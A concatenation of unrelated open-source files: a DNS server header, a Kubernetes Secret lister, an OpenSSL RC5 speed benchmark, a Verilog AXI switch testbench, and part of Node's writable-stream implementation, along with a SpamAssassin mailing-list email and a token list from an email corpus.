unsigned char QR : 1; // query/response flag
unsigned char RCode : 4; // response code
unsigned char Z : 3; // its z! reserved
unsigned char RA : 1; // recursion available
uint16_t QDCount; // number of question entries
uint16_t ANCount; // number of answer entries
uint16_t NSCount; // number of authority entries
uint16_t ARCount; // number of resource entries
};
class DNSServer
{
public:
DNSServer();
~DNSServer() {
stop();
};
void processNextRequest();
void setErrorReplyCode(const DNSReplyCode &replyCode);
void setTTL(const uint32_t &ttl);
// Returns true if successful, false if there are no sockets available
bool start(const uint16_t &port,
const String &domainName,
const IPAddress &resolvedIP);
// stops the DNS server
void stop();
private:
WiFiUDP _udp;
uint16_t _port;
String _domainName;
unsigned char _resolvedIP[4];
uint32_t _ttl;
DNSReplyCode _errorReplyCode;
void downcaseAndRemoveWwwPrefix(String &domainName);
void replyWithIP(DNSHeader *dnsHeader,
unsigned char * query,
size_t queryLength);
void replyWithError(DNSHeader *dnsHeader,
DNSReplyCode rcode,
unsigned char *query,
size_t queryLength);
void replyWithError(DNSHeader *dnsHeader,
DNSReplyCode rcode);
void respondToRequest(uint8_t *buffer, size_t length);
void writeNBOShort(uint16_t value);
};
#endif
| {
"pile_set_name": "Github"
} |
[Desktop Entry]
Type=Service
ServiceTypes=RazorDesktop/Plugin
Name=Hello World
Comment=Display rich text on the screen
#TRANSLATIONS_DIR=../translations
# Translations
Comment[eo]=Montri riĉan tekston ekrane
Name[eo]=Saluton, mondo!
| {
"pile_set_name": "Github"
} |
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by lister-gen. DO NOT EDIT.
package v1
import (
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/client-go/tools/cache"
)
// SecretLister helps list Secrets.
type SecretLister interface {
// List lists all Secrets in the indexer.
List(selector labels.Selector) (ret []*v1.Secret, err error)
// Secrets returns an object that can list and get Secrets.
Secrets(namespace string) SecretNamespaceLister
SecretListerExpansion
}
// secretLister implements the SecretLister interface.
type secretLister struct {
indexer cache.Indexer
}
// NewSecretLister returns a new SecretLister.
func NewSecretLister(indexer cache.Indexer) SecretLister {
return &secretLister{indexer: indexer}
}
// List lists all Secrets in the indexer.
func (s *secretLister) List(selector labels.Selector) (ret []*v1.Secret, err error) {
err = cache.ListAll(s.indexer, selector, func(m interface{}) {
ret = append(ret, m.(*v1.Secret))
})
return ret, err
}
// Secrets returns an object that can list and get Secrets.
func (s *secretLister) Secrets(namespace string) SecretNamespaceLister {
return secretNamespaceLister{indexer: s.indexer, namespace: namespace}
}
// SecretNamespaceLister helps list and get Secrets.
type SecretNamespaceLister interface {
// List lists all Secrets in the indexer for a given namespace.
List(selector labels.Selector) (ret []*v1.Secret, err error)
// Get retrieves the Secret from the indexer for a given namespace and name.
Get(name string) (*v1.Secret, error)
SecretNamespaceListerExpansion
}
// secretNamespaceLister implements the SecretNamespaceLister
// interface.
type secretNamespaceLister struct {
indexer cache.Indexer
namespace string
}
// List lists all Secrets in the indexer for a given namespace.
func (s secretNamespaceLister) List(selector labels.Selector) (ret []*v1.Secret, err error) {
err = cache.ListAllByNamespace(s.indexer, s.namespace, selector, func(m interface{}) {
ret = append(ret, m.(*v1.Secret))
})
return ret, err
}
// Get retrieves the Secret from the indexer for a given namespace and name.
func (s secretNamespaceLister) Get(name string) (*v1.Secret, error) {
obj, exists, err := s.indexer.GetByKey(s.namespace + "/" + name)
if err != nil {
return nil, err
}
if !exists {
return nil, errors.NewNotFound(v1.Resource("secret"), name)
}
return obj.(*v1.Secret), nil
}
| {
"pile_set_name": "Github"
} |
:ship:
| {
"pile_set_name": "Github"
} |
/* -*-c++-*- OpenSceneGraph - Copyright (C) 1998-2008 Robert Osfield
*
* This library is open source and may be redistributed and/or modified under
* the terms of the OpenSceneGraph Public License (OSGPL) version 0.0 or
* (at your option) any later version. The full license is in LICENSE file
* included with this distribution, and on the openscenegraph.org website.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* OpenSceneGraph Public License for more details.
*/
#ifndef OSGWIDGET_VNCCLIENT
#define OSGWIDGET_VNCCLIENT
#include <osgDB/ReaderWriter>
#include <osgWidget/PdfReader>
namespace osgWidget {
/** Pure virtual base class for VncImage that is sublcassed by vnc plugin to provide the actual implementation.*/
class VncImage : public osg::Image
{
public:
VncImage() {}
virtual bool connect(const std::string& hostname) = 0;
virtual void close() = 0;
protected:
virtual ~VncImage() {}
};
/** Convenience Vnc Client class that provides a interactive quad that can be placed directly in the scene.*/
class OSGWIDGET_EXPORT VncClient : public osg::Geode
{
public:
VncClient() {}
VncClient(const std::string& hostname, const GeometryHints& hints = GeometryHints());
bool assign(VncImage* vncImage, const GeometryHints& hints = GeometryHints());
bool connect(const std::string& hostname, const GeometryHints& hints = GeometryHints());
void close();
protected:
osg::ref_ptr<VncImage> _vncImage;
};
}
#endif
| {
"pile_set_name": "Github"
} |
9p
1441
103443
624
104421
m8cs44860wfj
oldreturnpath
fashioned
read
mass
failure
postfix
encodingutf8
httpwwwrolandtanglaocomcategoriessoapnxmlrpc
smtp
test
comicscomcomicsdilbertdailydilbertimagesdailydilbertheadermidbot
begin
alien
wasnt
resentmessageid
uswsflist1sourceforgenet
clientip8219575100
account5
httpwwwquicktopiccomboinghk9nshvkkrrxi
autolearnham
in
switched
your
slip
internal
returnpath
mailtodebianuserlistsdebianorg
point
fffsecuritya
too
bay
subject
networks20
path
manuscripts
piles
using
469
email
listunsubscribe
yes
fundamentalsbrbyahoo
jmjmasonorg
but
goto
11
0000
v15
below
debian
security
be67e6c8431
url
6541216221
ehmadscientistcom
yyyylocalhostnetnoteinccom
width3d45
online
radio
gldudebianuser2mgmaneorg
oct
fallback
required53
xacceptlanguage
opensourceeeethzch
startup
lairxentcom
domain
pollack
090803
primarily
had
pcie
re
cest
imprononcable1ldosubscriberldowhitelistmurphywrongword1
uttered
dynnjablerr0
recycling
httplistsapplecommailmanlistinfojavadev
every
61
0400
burst
idea
clean
required40
cline
114910
it
sun
xoriginaldate
demostrate
esmtp
bhwwap0brjmd4vhiueq8togmtcsztbrntweskbi1plk
141317
24
gmailid1280f785a65bb1c2
quotedemailtextrcvdinmultihopdsbl
1237
deliveredto
xmozillastatus2
35
disinterested
localhost
principle
as
80347440cc
butt
spfpass
well
offscreen
has
dateinpast12240992
messageid
10
height8td
gross
srchttphomecnetcombgif
b160f16f1e
organizing
spamassassintalkexamplesourceforgenet
httpxentcommailmanlistinfofork
or
comes
resentfrom
splitsabbr
fastest
a4rjf0nbhntpt6i8vq1c9cw17
340976951424841270571770256javamailrootmd01wowsynacorcom
groups
000021
they
aaaaaa
contenttransferencoding
framework
p05111a5bb9ae46820c6e66149496
alttech
textplain
127001
outlook
that
microsoftr
aaaaarpwkeg
to
purpose
ratwaregeckobuild
singledrop
now
you
web
know
utc
amavisdnew
sign
recently
resentdate
inreplyto
references
q2z951d34ac1004191247oa5db050v24437077ee2cbf9fmailcsminingorg
at
1
id
modules
port
forkexamplecom
on
ceo
peltonen
date
friends
tex
dunno
2010
strange
filetimeb59cf9f001c260c6
625
googlecom
by
20100507
then
anger
unsubscribe
even
client
listmasterlistsdebianorg
helo
via
ldowhitelist5
galilei
xbeenthere
gateway1messagingenginecom
back
0100
xamavisstatus
little
src3dhttpwwwcnetcombgif
not
listsubscribe
102239978
with
from
gasp
still
mailtodebiankderequestlistsdebianorgsubjecthelp
20
mimeversion
heaven
wdd
outgoingsecurityfocuscom
af2sx6b92j091lhfioa9
hotline
use
listid
fetchmail590
xaccountkey
hdomainkeysignaturemimeversionreceiveddatereceivedmessageid
friday
sender
end
permitted
precedence
file
which
50abr
an
score7
original
7bit
be
listpost
reads
account
hyderabad
bits
shortduration
version250cvs
finds
guess
install
rtorvivsnlnet
7
repeatedly
benefit
bssiguanasuicidenet
mailtodebianuserrequestlistsdebianorgsubjectunsubscribe
81168116
none
pvb32
ccg2sjwadlbr
spam
013346
archive
writes
uptotheminute
some
tx
version325
bizsmtp
contenttype
may
secure
apollo
other
of
eskso0ztqm4e
mozilla
01
and
received
runtime
windows
wed
list
0031
usually
s0832016219710167
the
39b3016f22
only
freshrpms
| {
"pile_set_name": "Github"
} |
/* crypto/rc5/rc5speed.c */
/* Copyright (C) 1995-1998 Eric Young ([email protected])
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young ([email protected]).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson ([email protected]).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young ([email protected])"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson ([email protected])"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
/* 11-Sep-92 Andrew Daviel Support for Silicon Graphics IRIX added */
/* 06-Apr-92 Luke Brennan Support for VMS and add extra signal calls */
#if !defined(OPENSSL_SYS_MSDOS) && (!defined(OPENSSL_SYS_VMS) || defined(__DECC)) && !defined(OPENSSL_SYS_MACOSX)
# define TIMES
#endif
#include <stdio.h>
#include <openssl/e_os2.h>
#include OPENSSL_UNISTD_IO
OPENSSL_DECLARE_EXIT
#ifndef OPENSSL_SYS_NETWARE
# include <signal.h>
#endif
#ifndef _IRIX
# include <time.h>
#endif
#ifdef TIMES
# include <sys/types.h>
# include <sys/times.h>
#endif
/*
* Depending on the VMS version, the tms structure is perhaps defined.
* The __TMS macro will show if it was. If it wasn't defined, we should
* undefine TIMES, since that tells the rest of the program how things
* should be handled. -- Richard Levitte
*/
#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__TMS)
# undef TIMES
#endif
#ifndef TIMES
# include <sys/timeb.h>
#endif
#if defined(sun) || defined(__ultrix)
# define _POSIX_SOURCE
# include <limits.h>
# include <sys/param.h>
#endif
#include <openssl/rc5.h>
/* The following if from times(3) man page. It may need to be changed */
#ifndef HZ
# ifndef CLK_TCK
# define HZ 100.0
# else /* CLK_TCK */
# define HZ ((double)CLK_TCK)
# endif
#endif
#define BUFSIZE ((long)1024)
long run = 0;
double Time_F(int s);
#ifdef SIGALRM
# if defined(__STDC__) || defined(sgi) || defined(_AIX)
# define SIGRETTYPE void
# else
# define SIGRETTYPE int
# endif
SIGRETTYPE sig_done(int sig);
SIGRETTYPE sig_done(int sig)
{
signal(SIGALRM, sig_done);
run = 0;
# ifdef LINT
sig = sig;
# endif
}
#endif
#define START 0
#define STOP 1
double Time_F(int s)
{
double ret;
#ifdef TIMES
static struct tms tstart, tend;
if (s == START) {
times(&tstart);
return (0);
} else {
times(&tend);
ret = ((double)(tend.tms_utime - tstart.tms_utime)) / HZ;
return ((ret == 0.0) ? 1e-6 : ret);
}
#else /* !times() */
static struct timeb tstart, tend;
long i;
if (s == START) {
ftime(&tstart);
return (0);
} else {
ftime(&tend);
i = (long)tend.millitm - (long)tstart.millitm;
ret = ((double)(tend.time - tstart.time)) + ((double)i) / 1e3;
return ((ret == 0.0) ? 1e-6 : ret);
}
#endif
}
int main(int argc, char **argv)
{
long count;
static unsigned char buf[BUFSIZE];
static unsigned char key[] = {
0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10,
};
RC5_32_KEY sch;
double a, b, c, d;
#ifndef SIGALRM
long ca, cb, cc;
#endif
#ifndef TIMES
printf("To get the most accurate results, try to run this\n");
printf("program when this computer is idle.\n");
#endif
#ifndef SIGALRM
printf("First we calculate the approximate speed ...\n");
RC5_32_set_key(&sch, 16, key, 12);
count = 10;
do {
long i;
unsigned long data[2];
count *= 2;
Time_F(START);
for (i = count; i; i--)
RC5_32_encrypt(data, &sch);
d = Time_F(STOP);
} while (d < 3.0);
ca = count / 512;
cb = count;
cc = count * 8 / BUFSIZE + 1;
printf("Doing RC5_32_set_key %ld times\n", ca);
# define COND(d) (count != (d))
# define COUNT(d) (d)
#else
# define COND(c) (run)
# define COUNT(d) (count)
signal(SIGALRM, sig_done);
printf("Doing RC5_32_set_key for 10 seconds\n");
alarm(10);
#endif
Time_F(START);
for (count = 0, run = 1; COND(ca); count += 4) {
RC5_32_set_key(&sch, 16, key, 12);
RC5_32_set_key(&sch, 16, key, 12);
RC5_32_set_key(&sch, 16, key, 12);
RC5_32_set_key(&sch, 16, key, 12);
}
d = Time_F(STOP);
printf("%ld RC5_32_set_key's in %.2f seconds\n", count, d);
a = ((double)COUNT(ca)) / d;
#ifdef SIGALRM
printf("Doing RC5_32_encrypt's for 10 seconds\n");
alarm(10);
#else
printf("Doing RC5_32_encrypt %ld times\n", cb);
#endif
Time_F(START);
for (count = 0, run = 1; COND(cb); count += 4) {
unsigned long data[2];
RC5_32_encrypt(data, &sch);
RC5_32_encrypt(data, &sch);
RC5_32_encrypt(data, &sch);
RC5_32_encrypt(data, &sch);
}
d = Time_F(STOP);
printf("%ld RC5_32_encrypt's in %.2f second\n", count, d);
b = ((double)COUNT(cb) * 8) / d;
#ifdef SIGALRM
printf("Doing RC5_32_cbc_encrypt on %ld byte blocks for 10 seconds\n",
BUFSIZE);
alarm(10);
#else
printf("Doing RC5_32_cbc_encrypt %ld times on %ld byte blocks\n", cc,
BUFSIZE);
#endif
Time_F(START);
for (count = 0, run = 1; COND(cc); count++)
RC5_32_cbc_encrypt(buf, buf, BUFSIZE, &sch, &(key[0]), RC5_ENCRYPT);
d = Time_F(STOP);
printf("%ld RC5_32_cbc_encrypt's of %ld byte blocks in %.2f second\n",
count, BUFSIZE, d);
c = ((double)COUNT(cc) * BUFSIZE) / d;
printf("RC5_32/12/16 set_key per sec = %12.2f (%9.3fuS)\n", a,
1.0e6 / a);
printf("RC5_32/12/16 raw ecb bytes per sec = %12.2f (%9.3fuS)\n", b,
8.0e6 / b);
printf("RC5_32/12/16 cbc bytes per sec = %12.2f (%9.3fuS)\n", c,
8.0e6 / c);
exit(0);
#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
return (0);
#endif
}
| {
"pile_set_name": "Github"
} |
From [email protected] Wed Aug 28 10:45:34 2002
Return-Path: <[email protected]>
Delivered-To: [email protected]
Received: from localhost (localhost [127.0.0.1])
by phobos.labs.netnoteinc.com (Postfix) with ESMTP id 00F6F4415B
for <jm@localhost>; Wed, 28 Aug 2002 05:44:48 -0400 (EDT)
Received: from phobos [127.0.0.1]
by localhost with IMAP (fetchmail-5.9.0)
for jm@localhost (single-drop); Wed, 28 Aug 2002 10:44:48 +0100 (IST)
Received: from proton.pathname.com
(adsl-216-103-211-240.dsl.snfc21.pacbell.net [216.103.211.240]) by
dogma.slashnull.org (8.11.6/8.11.6) with ESMTP id g7RLjPZ27063 for
<[email protected]>; Tue, 27 Aug 2002 22:45:25 +0100
Received: from quinlan by proton.pathname.com with local (Exim 3.35 #1
(Debian)) id 17jo9X-00072t-00; Tue, 27 Aug 2002 14:45:35 -0700
To: [email protected] (Justin Mason)
Cc: Matt Sergeant <[email protected]>,
[email protected]
Subject: Re: [SAdev] SpamAssassin POP3 proxy
References: <[email protected]>
From: Daniel Quinlan <[email protected]>
Date: 27 Aug 2002 14:45:35 -0700
In-Reply-To: [email protected]'s message of "Tue, 27 Aug 2002 13:17:15 +0100"
Message-Id: <[email protected]>
Lines: 15
X-Mailer: Gnus v5.7/Emacs 20.7
X-Pyzor: Reported 0 times.
X-Spam-Status: No, hits=-5.7 required=7.0
tests=EMAIL_ATTRIBUTION,IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,
SPAM_PHRASE_00_01
version=2.40-cvs
X-Spam-Level:
[email protected] (Justin Mason) writes:
> Actually, I want to avoid that -- I've already removed spamproxyd
> from the distro for 2.40. Here's why:
>
> When they're in the distro, *we* have to support them -- which is
> not necessarily a good thing when we didn't write them in the first
> place, or when the coder in question may not *want* us to maintain
> them. :(
I would be in favor of creating new SpamAssassin CVS modules and
Bugzilla categories for other clients (provided there is sufficient
interest and a maintainer).
Dan
| {
"pile_set_name": "Github"
} |
/*
Copyright (c) 2020 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
*/
// Language: Verilog 2001
`timescale 1ns / 1ps
/*
* Testbench for axis_ram_switch
*/
module test_axis_ram_switch_1x4_256_64;
// Parameters
parameter FIFO_DEPTH = 512;
parameter SPEEDUP = 0;
parameter S_COUNT = 1;
parameter M_COUNT = 4;
parameter S_DATA_WIDTH = 256;
parameter S_KEEP_ENABLE = (S_DATA_WIDTH>8);
parameter S_KEEP_WIDTH = (S_DATA_WIDTH/8);
parameter M_DATA_WIDTH = 64;
parameter M_KEEP_ENABLE = (M_DATA_WIDTH>8);
parameter M_KEEP_WIDTH = (M_DATA_WIDTH/8);
parameter ID_ENABLE = 1;
parameter ID_WIDTH = 8;
parameter DEST_WIDTH = $clog2(M_COUNT+1);
parameter USER_ENABLE = 1;
parameter USER_WIDTH = 1;
parameter USER_BAD_FRAME_VALUE = 1'b1;
parameter USER_BAD_FRAME_MASK = 1'b1;
parameter DROP_BAD_FRAME = 1;
parameter DROP_WHEN_FULL = 0;
parameter M_BASE = {3'd3, 3'd2, 3'd1, 3'd0};
parameter M_TOP = {3'd3, 3'd2, 3'd1, 3'd0};
parameter M_CONNECT = {M_COUNT{{S_COUNT{1'b1}}}};
parameter ARB_TYPE = "ROUND_ROBIN";
parameter LSB_PRIORITY = "HIGH";
parameter RAM_PIPELINE = 2;
// Inputs
reg clk = 0;
reg rst = 0;
reg [7:0] current_test = 0;
reg [S_COUNT*S_DATA_WIDTH-1:0] s_axis_tdata = 0;
reg [S_COUNT*S_KEEP_WIDTH-1:0] s_axis_tkeep = 0;
reg [S_COUNT-1:0] s_axis_tvalid = 0;
reg [S_COUNT-1:0] s_axis_tlast = 0;
reg [S_COUNT*ID_WIDTH-1:0] s_axis_tid = 0;
reg [S_COUNT*DEST_WIDTH-1:0] s_axis_tdest = 0;
reg [S_COUNT*USER_WIDTH-1:0] s_axis_tuser = 0;
reg [M_COUNT-1:0] m_axis_tready = 0;
// Outputs
wire [S_COUNT-1:0] s_axis_tready;
wire [M_COUNT*M_DATA_WIDTH-1:0] m_axis_tdata;
wire [M_COUNT*M_KEEP_WIDTH-1:0] m_axis_tkeep;
wire [M_COUNT-1:0] m_axis_tvalid;
wire [M_COUNT-1:0] m_axis_tlast;
wire [M_COUNT*ID_WIDTH-1:0] m_axis_tid;
wire [M_COUNT*DEST_WIDTH-1:0] m_axis_tdest;
wire [M_COUNT*USER_WIDTH-1:0] m_axis_tuser;
wire [S_COUNT-1:0] status_overflow;
wire [S_COUNT-1:0] status_bad_frame;
wire [S_COUNT-1:0] status_good_frame;
initial begin
// myhdl integration
$from_myhdl(
clk,
rst,
current_test,
s_axis_tdata,
s_axis_tkeep,
s_axis_tvalid,
s_axis_tlast,
s_axis_tid,
s_axis_tdest,
s_axis_tuser,
m_axis_tready
);
$to_myhdl(
s_axis_tready,
m_axis_tdata,
m_axis_tkeep,
m_axis_tvalid,
m_axis_tlast,
m_axis_tid,
m_axis_tdest,
m_axis_tuser,
status_overflow,
status_bad_frame,
status_good_frame
);
// dump file
$dumpfile("test_axis_ram_switch_1x4_256_64.lxt");
$dumpvars(0, test_axis_ram_switch_1x4_256_64);
end
axis_ram_switch #(
.FIFO_DEPTH(FIFO_DEPTH),
.SPEEDUP(SPEEDUP),
.S_COUNT(S_COUNT),
.M_COUNT(M_COUNT),
.S_DATA_WIDTH(S_DATA_WIDTH),
.S_KEEP_ENABLE(S_KEEP_ENABLE),
.S_KEEP_WIDTH(S_KEEP_WIDTH),
.M_DATA_WIDTH(M_DATA_WIDTH),
.M_KEEP_ENABLE(M_KEEP_ENABLE),
.M_KEEP_WIDTH(M_KEEP_WIDTH),
.ID_ENABLE(ID_ENABLE),
.ID_WIDTH(ID_WIDTH),
.DEST_WIDTH(DEST_WIDTH),
.USER_ENABLE(USER_ENABLE),
.USER_WIDTH(USER_WIDTH),
.USER_BAD_FRAME_VALUE(USER_BAD_FRAME_VALUE),
.USER_BAD_FRAME_MASK(USER_BAD_FRAME_MASK),
.DROP_BAD_FRAME(DROP_BAD_FRAME),
.DROP_WHEN_FULL(DROP_WHEN_FULL),
.M_BASE(M_BASE),
.M_TOP(M_TOP),
.M_CONNECT(M_CONNECT),
.ARB_TYPE(ARB_TYPE),
.LSB_PRIORITY(LSB_PRIORITY),
.RAM_PIPELINE(RAM_PIPELINE)
)
UUT (
.clk(clk),
.rst(rst),
// AXI inputs
.s_axis_tdata(s_axis_tdata),
.s_axis_tkeep(s_axis_tkeep),
.s_axis_tvalid(s_axis_tvalid),
.s_axis_tready(s_axis_tready),
.s_axis_tlast(s_axis_tlast),
.s_axis_tid(s_axis_tid),
.s_axis_tdest(s_axis_tdest),
.s_axis_tuser(s_axis_tuser),
// AXI output
.m_axis_tdata(m_axis_tdata),
.m_axis_tkeep(m_axis_tkeep),
.m_axis_tvalid(m_axis_tvalid),
.m_axis_tready(m_axis_tready),
.m_axis_tlast(m_axis_tlast),
.m_axis_tid(m_axis_tid),
.m_axis_tdest(m_axis_tdest),
.m_axis_tuser(m_axis_tuser),
// Status
.status_overflow(status_overflow),
.status_bad_frame(status_bad_frame),
.status_good_frame(status_good_frame)
);
endmodule
| {
"pile_set_name": "Github"
} |
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
// A bit simpler than readable streams.
// Implement an async ._write(chunk, encoding, cb), and it'll handle all
// the drain event emission and buffering.
'use strict';
/*<replacement>*/
var processNextTick = require('process-nextick-args');
/*</replacement>*/
module.exports = Writable;
/* <replacement> */
function WriteReq(chunk, encoding, cb) {
this.chunk = chunk;
this.encoding = encoding;
this.callback = cb;
this.next = null;
}
// It seems a linked list but it is not
// there will be only 2 of these for each stream
function CorkedRequest(state) {
var _this = this;
this.next = null;
this.entry = null;
this.finish = function () {
onCorkedFinish(_this, state);
};
}
/* </replacement> */
/*<replacement>*/
var asyncWrite = !process.browser && ['v0.10', 'v0.9.'].indexOf(process.version.slice(0, 5)) > -1 ? setImmediate : processNextTick;
/*</replacement>*/
/*<replacement>*/
var Duplex;
/*</replacement>*/
Writable.WritableState = WritableState;
/*<replacement>*/
var util = require('core-util-is');
util.inherits = require('inherits');
/*</replacement>*/
/*<replacement>*/
var internalUtil = {
deprecate: require('util-deprecate')
};
/*</replacement>*/
/*<replacement>*/
var Stream = require('./internal/streams/stream');
/*</replacement>*/
/*<replacement>*/
var Buffer = require('safe-buffer').Buffer;
var OurUint8Array = global.Uint8Array || function () {};
function _uint8ArrayToBuffer(chunk) {
return Buffer.from(chunk);
}
function _isUint8Array(obj) {
return Buffer.isBuffer(obj) || obj instanceof OurUint8Array;
}
/*</replacement>*/
var destroyImpl = require('./internal/streams/destroy');
util.inherits(Writable, Stream);
function nop() {}
function WritableState(options, stream) {
Duplex = Duplex || require('./_stream_duplex');
options = options || {};
// object stream flag to indicate whether or not this stream
// contains buffers or objects.
this.objectMode = !!options.objectMode;
if (stream instanceof Duplex) this.objectMode = this.objectMode || !!options.writableObjectMode;
// the point at which write() starts returning false
// Note: 0 is a valid value, means that we always return false if
// the entire buffer is not flushed immediately on write()
var hwm = options.highWaterMark;
var defaultHwm = this.objectMode ? 16 : 16 * 1024;
this.highWaterMark = hwm || hwm === 0 ? hwm : defaultHwm;
// cast to ints.
this.highWaterMark = Math.floor(this.highWaterMark);
// if _final has been called
this.finalCalled = false;
// drain event flag.
this.needDrain = false;
// at the start of calling end()
this.ending = false;
// when end() has been called, and returned
this.ended = false;
// when 'finish' is emitted
this.finished = false;
// has it been destroyed
this.destroyed = false;
// should we decode strings into buffers before passing to _write?
// this is here so that some node-core streams can optimize string
// handling at a lower level.
var noDecode = options.decodeStrings === false;
this.decodeStrings = !noDecode;
// Crypto is kind of old and crusty. Historically, its default string
// encoding is 'binary' so we have to make this configurable.
// Everything else in the universe uses 'utf8', though.
this.defaultEncoding = options.defaultEncoding || 'utf8';
// not an actual buffer we keep track of, but a measurement
// of how much we're waiting to get pushed to some underlying
// socket or file.
this.length = 0;
// a flag to see when we're in the middle of a write.
this.writing = false;
// when true all writes will be buffered until .uncork() call
this.corked = 0;
// a flag to be able to tell if the onwrite cb is called immediately,
// or on a later tick. We set this to true at first, because any
// actions that shouldn't happen until "later" should generally also
// not happen before the first write call.
this.sync = true;
// a flag to know if we're processing previously buffered items, which
// may call the _write() callback in the same tick, so that we don't
// end up in an overlapped onwrite situation.
this.bufferProcessing = false;
// the callback that's passed to _write(chunk,cb)
this.onwrite = function (er) {
onwrite(stream, er);
};
// the callback that the user supplies to write(chunk,encoding,cb)
this.writecb = null;
// the amount that is being written when _write is called.
this.writelen = 0;
this.bufferedRequest = null;
this.lastBufferedRequest = null;
// number of pending user-supplied write callbacks
// this must be 0 before 'finish' can be emitted
this.pendingcb = 0;
// emit prefinish if the only thing we're waiting for is _write cbs
// This is relevant for synchronous Transform streams
this.prefinished = false;
// True if the error was already emitted and should not be thrown again
this.errorEmitted = false;
// count buffered requests
this.bufferedRequestCount = 0;
// allocate the first CorkedRequest, there is always
// one allocated and free to use, and we maintain at most two
this.corkedRequestsFree = new CorkedRequest(this);
}
WritableState.prototype.getBuffer = function getBuffer() {
var current = this.bufferedRequest;
var out = [];
while (current) {
out.push(current);
current = current.next;
}
return out;
};
(function () {
try {
Object.defineProperty(WritableState.prototype, 'buffer', {
get: internalUtil.deprecate(function () {
return this.getBuffer();
